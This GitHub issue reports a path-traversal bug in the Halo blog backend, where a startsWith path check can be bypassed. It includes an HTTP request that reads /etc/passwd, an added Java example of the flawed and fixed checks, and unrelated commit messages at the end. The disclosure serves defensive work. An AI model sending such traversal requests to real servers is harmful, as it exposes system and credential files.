
An Arbitrary File reading vulnerability in the backend(bypass the Path check) #420

Closed · 5 tasks done
any-how opened this issue Dec 11, 2019 · 1 comment
Labels: kind/bug (Categorizes issue or PR as related to a bug.)

Comments


any-how commented Dec 11, 2019

I am sure I have checked

I want to apply
  • BUG feedback

In an interface that reads files in the backend, a directory traversal check is performed on the input path parameter, but the check, which uses the startsWith function, can be bypassed.

So I can read any file using the following request:

GET /api/admin/themes/caicai_anatole/files/content?path=%2Froot%2F.halo%2Ftemplates%2Fthemes%2Fanatole%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F/passwd HTTP/1.1
Host: 100.101.61.13:8090
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Referer: http://100.101.61.13:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
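The failure mode described in this report, shown side by side with the usual normalise-then-compare fix. This is an added example, not Halo's own code or the referenced commit; the theme directory and file names are constructed from the path in the report, and POSIX path semantics are assumed.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example, not Halo's code: a String.startsWith() prefix check on the raw
// path string versus a component-wise check on the normalised Path.
public class ThemePathCheck {
    // Constructed base directory, modelled on the theme path shown in the report.
    static final Path THEME_ROOT = Paths.get("/root/.halo/templates/themes/anatole");

    // Vulnerable pattern: textual prefix check. A request such as
    // "/root/.halo/templates/themes/anatole/../../../../../../etc/passwd" starts
    // with the theme root as a string, so it passes, although it resolves to /etc/passwd.
    static boolean vulnerableCheck(String requested) {
        return requested.startsWith(THEME_ROOT.toString());
    }

    // Hardened pattern: resolve against the root, normalise away "." and "..",
    // then compare path components with Path.startsWith rather than characters,
    // so a sibling directory like "anatole-evil" is rejected as well.
    // (Path.toRealPath() would additionally follow symlinks, but needs the file to exist.)
    static boolean hardenedCheck(String requested) {
        Path candidate = THEME_ROOT.resolve(requested).normalize();
        return candidate.startsWith(THEME_ROOT);
    }

    public static void main(String[] args) {
        // Constructed sample inputs: a legitimate theme file, the traversal from the
        // report, and a sibling directory that shares the textual prefix.
        String[] inputs = {
            "/root/.halo/templates/themes/anatole/index.ftl",
            "/root/.halo/templates/themes/anatole/../../../../../../etc/passwd",
            "/root/.halo/templates/themes/anatole-evil/index.ftl",
        };
        for (String p : inputs) {
            System.out.printf("%-72s vulnerable=%-5b hardened=%b%n",
                    p, vulnerableCheck(p), hardenedCheck(p));
        }
    }
}
```

Only the first input is accepted by hardenedCheck; vulnerableCheck accepts all three.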

@any-how any-how changed the title An Arbitrary File reading in the backend(bypass the Path check) An Arbitrary File reading vulnerability in the backend(bypass the Path check) Dec 12, 2019
@JohnNiang JohnNiang added the kind/bug Categorizes issue or PR as related to a bug. label Dec 12, 2019
@JohnNiang JohnNiang self-assigned this Dec 12, 2019
@JohnNiang (Member)

I wrote this function incorrectly, and it has been fixed by d59877a.

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* refactor: attachment selection modal

Signed-off-by: Ryan Wang <i@ryanc.cc>

* feat: support view attachment detail

Signed-off-by: Ryan Wang <i@ryanc.cc>

* chore: remove AttachmentSelectDrawer.vue

Signed-off-by: Ryan Wang <i@ryanc.cc>

* chore: remove AttachmentDrawer.vue

Signed-off-by: Ryan Wang <i@ryanc.cc>

* perf: add selected icon

Signed-off-by: Ryan Wang <i@ryanc.cc>

* perf: add search form

Signed-off-by: Ryan Wang <i@ryanc.cc>

* perf: support upload file

Signed-off-by: Ryan Wang <i@ryanc.cc>

* refactor: attachment selection modal

Signed-off-by: Ryan Wang <i@ryanc.cc>